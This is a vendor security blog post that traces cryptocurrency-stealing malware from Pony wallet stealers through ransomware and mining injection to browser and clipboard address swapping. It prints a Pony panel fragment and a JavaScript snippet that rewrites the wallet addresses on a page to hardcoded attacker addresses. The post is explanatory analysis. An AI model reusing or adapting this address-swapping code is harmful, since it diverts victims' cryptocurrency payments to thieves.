Cryptocurrency malware: an explosive mix!

Since cryptocurrencies came on the scene in late 2008 and early 2009, new malware has gradually emerged that does its utmost to steal users’ wallets and cryptocurrencies. This malware, just like all the others, has steadily evolved, implementing new methods for achieving its goals, as we explain below.

Early cryptocurrency thefts were carried out using typical stealer malware, such as the Pony family, which had added a new module that was able to extract the private passwords of the wallets located in the victim’s device. Shown below is a fragment of code from a control panel that enables the hacker to download all the stolen private passwords into a zip file.

if ($admin_routine == 'download_wallet' && $admin_action == 'other'){ 
    set_common_file_download_header('', 'application/zip'); 
    $pony_db -> get_wallet_zip(); 

After a while, new more effective methods cropped up and, as the reader may already know, we’re referring to the notorious Ransomware. Just to remind you, the main aim of this malware is to encrypt all of an infected machine’s files and demand a ransom in exchange, usually in Bitcoins.


This type of malware has been, and is, extremely successful, which is why countless variants have sprung up. But, as always occurs, when another form of malware is developed, new technologies also materialize to mitigate it so, even though cybercriminals have not discarded Ransomware, they have evolved by creating other types.

Close on the heels of Ransomware, malware samples began emerging whose purpose was to introduce Javascript mining onto all the webpages we browse, so that infected users are mining continuously while they are surfing the Internet.


In the early stages, this injection was carried out by infecting the device but, later on, these injections also appeared via browser add-ons and the websites themselves even began inserting them in order to reap rewards that were an alternative to the traditional ads they display.

Nevertheless, as occurred with Ransomware, anti-mining measures were developed and many popular Adblockers managed to block the webpages from where the Javascript was loaded.

Criminals had to reinvent themselves again, and they began injecting Javascript code into infected machines’ browsers so that when the user navigated to a webpage that contained a cryptocurrency wallet address, they would replace that address with a spoofed one.

Shown below is a fragment of Javascript code where an attempt is made to change the addresses of the Litecoin, Ethereum and Bitcoin currencies.

function init() {
    var a = document.documentElement.innerHTML;
    str = a.replace(/<.*?>/g, " ") .replace(/ +/g, " ");
    str = str.split(" ") .filter(function(a) {
    return (a = a.match(/(\w+)/)) && 24 < a[0].length
    .join(" ");
    var b = str.split(" ");

    for (a = 0; a < b.length; a++) 1 == checkBtc(b[a]) ? "L" == b[a].substring(0, 1) ? (document.body.innerHTML = document.body.innerHTML.replace(b[a], "LKyKqLVy6KgyCYekftCHFTBLYiZyUvxtsG"), document.body.innerHTML = document.body.innerHTML.replace(b[a], "LKyKqLVy6KgyCYekftCHFTBLYiZyUvxtsG")) : (document.body.innerHTML = document.body.innerHTML.replace(b[a], "17bH1SYLoBdGsBaDedPR2EE3JUt8oRS7qd"), document.body.innerHTML = document.body.innerHTML.replace(b[a], "17bH1SYLoBdGsBaDedPR2EE3JUt8oRS7qd")) : 1 == checkEth(b[a]) && (document.body.innerHTML = document.body.innerHTML.replace(b[a], "0xa05AeF9CA4828A71f84d284F7A25A7Aa6D2fe114"), document.body.innerHTML = document.body.innerHTML.replace(b[a], "0xa05AeF9CA4828A71f84d284F7A25A7Aa6D2fe114"))

function checkEth(a) {
      return !!/^(0x)?[0-9a-f]{40}$/i.test(a) && (/^(0x)?[0-9a-f]{40}$/.test(a) || /^(0x)?[0-9A-F]{40}$/.test(a), !0)
function checkBtc(a) {
      return !(26 > a.length || 35 < a.length) && !!/^[A-Z0-9]+$/i.test(a)


Another variant that has recently sprung up is similar to the address change that occurs in the browser but, on this occasion, via the clipboard. In this way, when users copy their wallet address to carry out some action, the malware will change this address for its own. This is the case of the recently-discovered Evrial, to name but a few.

criptomonedas-02Moreover, all types of cryptocurrency malware and several methods for thieving from users still resort to popular online fraud techniques, such as phishing linked to intensive spam campaigns, where social engineering techniques are implemented to attempt to dupe users into entering their credentials for different exchanges and stealing the cryptocurrencies they possess.

It is obvious that this is just the beginning and new mitigations will be masterminded to prevent users from having their cryptocurrencies stolen, but what other cryptocurrency theft techniques and methods are waiting in the wings?

Posted by David Morán

David has more than 15 years’ experience in cybersecurity, systems and development, starting out in an extinct hacking team known as Badchecksum. He collaborated on Defcon 19 with the Painsec security team. He is versed in scalable environments thanks to his work at the Tuenti social network with a traffic load of over 12Gbps. He has been involved with buguroo almost since the outset and has taken part in all the tools developed by the company, including source code analysers, malware analysis, cyber intelligence, etc. He also has in-depth knowledge of the Linux kernel, having developed LKMs that acted as rootkits as well as malware for Windows environments. He is currently the head of Revelock’s development team, managing task distribution and negotiating with the Head of Technology.



buguroo’s cloud-based fraud detection delivers a straightforward solution for detecting and stopping today’s – and tomorrow’s malware threats. Banks and their customers can be protected from one of the most malicious threats in use by cybercriminals.


Solicita una demo

Would you like to know how our solution protects your bank?

Check how our solution can help you to resolve your company's online fraud issues by requesting a free DEMO and we explain it to you in detail.

Watch video

Did you like it? Share in your social communities.